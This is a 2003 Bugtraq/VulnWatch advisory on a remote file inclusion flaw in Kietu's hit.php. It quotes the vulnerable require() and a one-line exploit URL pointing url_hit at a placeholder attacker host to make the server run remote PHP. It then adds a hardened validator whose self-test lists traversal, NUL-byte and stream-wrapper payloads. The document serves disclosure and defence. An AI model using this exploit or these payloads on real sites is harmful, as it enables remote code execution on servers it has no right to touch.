[VulnWatch] Kietu ( PHP )

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/15/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sat, 15 Feb 2003 10:38:40 +0100
    
    

    Information :
    ─────────────
    Website : http://kietu.free.fr
    Version : 2.0, 2.3
    Problem : Remote file inclusion (the url_hit request parameter is used
              unvalidated as the path prefix of a require())

    PHP Code/Location :
    ───────────────────
    hit.php :
    ------------------------------------------------------------------
    // Which source the request data is read from depends only on the
    // register_globals setting; url_hit is attacker-controlled either way.
    if (!get_cfg_var("register_globals")) {
        // register_globals off: read the PHP 4 request arrays explicitly
        $kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
        $kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
        $kietu["website"] = $HTTP_GET_VARS["website"];
        $kietu["appel"] = $HTTP_GET_VARS["appel"];
        $kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
        $kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
        // GET value concatenated with a global of the same name (normally unset)
        $kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
    }
    else {
        // register_globals on: every request parameter is already a global
        $kietu["remote_addr"] = $REMOTE_ADDR;
        $kietu["http_user_agent"] = $HTTP_USER_AGENT;
        $kietu["website"] = $website;
        $kietu["appel"] = $appel;
        $kietu["http_referer"] = $HTTP_REFERER;
        $kietu["php_self"] = $PHP_SELF;
        $kietu["url_hit"] = $url_hit;
    }

    // Sink: the request-supplied prefix is prepended to "config.php", so
    // url_hit=http://[attacker]/ makes PHP fetch and execute a remote file
    require ($kietu["url_hit"]."config.php");
    ------------------------------------------------------------------

    Exploit :
    ─────────
    http://[target]/hit.php?url_hit=http://[attacker]/
    with the attacker hosting a file of their choice at :
    http://[attacker]/config.php

    The target fetches that config.php over HTTP and executes its PHP code
    with the privileges of the web server. Remote includes of http:// URLs
    require allow_url_fopen to be enabled on the target, which is the PHP 4
    default.
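A hardened replacement for the require() sink, written here as an added example; it is not Kietu's code and not the phpsecure.org patch. It assumes PHP 7.1 or later and that every legitimate config.php lives under the directory containing hit.php (an assumption about the install layout that the advisory does not state). The request value is read explicitly from $_GET, never via register_globals, passed through a strict allow-list, and then checked with realpath() to stay inside the install tree; the self-test feeds it the advisory's exploit value alongside traversal, absolute-path, NUL-byte and stream-wrapper variants.

```php
<?php
// Added example (not Kietu's code): a hardened replacement for the
//   require ($kietu["url_hit"]."config.php");
// sink quoted in the advisory. Assumes PHP 7.1+ and that every legitimate
// config.php lives under the directory that contains hit.php (an assumption
// about the install layout, not something the advisory states).
//
// Intended use inside hit.php (read the parameter explicitly from $_GET,
// never via register_globals, and validate before require):
//
//   $path = kietu_config_path(__DIR__, $_GET['url_hit'] ?? '');
//   if ($path === null) { http_response_code(400); exit; }
//   require $path;

/**
 * Map a request-supplied url_hit value to the config.php it may load.
 *
 * Returns the canonical absolute path, or null when the value is rejected.
 * Two independent checks are applied: a strict allow-list on the string,
 * then a realpath() containment check on the resolved file.
 */
function kietu_config_path(string $base, string $url_hit): ?string
{
    // Kietu builds "<url_hit>config.php", so url_hit is either empty or a
    // directory prefix ending in "/". Permit only simple relative segments:
    // no scheme (http://, php://), no leading "/", no ".", no "..", no NUL.
    if ($url_hit !== '' && !preg_match('#\A(?:[A-Za-z0-9_-]+/)+\z#', $url_hit)) {
        return null;
    }

    $root = realpath($base);
    $candidate = realpath($base . '/' . $url_hit . 'config.php');
    if ($root === false || $candidate === false) {
        return null;                       // base missing or file does not exist
    }

    // Defence in depth: even after the allow-list, refuse anything that
    // resolves outside $root (e.g. through a symlink in the install tree).
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/**
 * Self-test on a constructed throw-away install tree. Returns, per input,
 * whether the validator's verdict matched the expected one.
 */
function kietu_selftest(): array
{
    $base = sys_get_temp_dir() . '/kietu_' . bin2hex(random_bytes(4));
    mkdir($base . '/site', 0700, true);
    file_put_contents($base . '/config.php', "<?php // global config\n");
    file_put_contents($base . '/site/config.php', "<?php // per-site config\n");

    // constructed inputs => should the validator accept them?
    $cases = [
        ''                   => true,   // default: <base>/config.php
        'site/'              => true,   // legitimate sub-directory
        'http://[attacker]/' => false,  // the advisory's exploit value
        '../../etc/'         => false,  // path traversal
        '/etc/'              => false,  // absolute path
        "site/\0"            => false,  // NUL-byte truncation attempt
        'php://input/'       => false,  // stream wrapper
    ];

    $results = [];
    foreach ($cases as $url_hit => $expected) {
        $accepted = kietu_config_path($base, $url_hit) !== null;
        $results[$url_hit] = ($accepted === $expected);
    }

    unlink($base . '/site/config.php');
    unlink($base . '/config.php');
    rmdir($base . '/site');
    rmdir($base);
    return $results;
}

if (PHP_SAPI === 'cli') {
    foreach (kietu_selftest() as $input => $ok) {
        printf("%-24s %s\n", var_export($input, true), $ok ? 'ok' : 'FAIL');
    }
}
```

Run it with `php hit_hardened.php` to see each constructed input and whether the verdict was as expected. The allow-list alone already rejects the advisory's payload because ':' is not a permitted character; the realpath() containment check is kept as a second, independent barrier so that a later relaxation of the pattern, or a symlink planted in the install tree, cannot reopen the include to arbitrary locations.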

    Patch :
    ───────
    A patch can be found on http://www.phpsecure.org

    More details :
    ──────────────
    In French :
    http://www.frog-man.org/tutos/5holes8.txt

    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools

    This hole was published in "the Hackademy Journal 01", October 2002
    (http://www.dmpfrance.com).

    frog-m@n

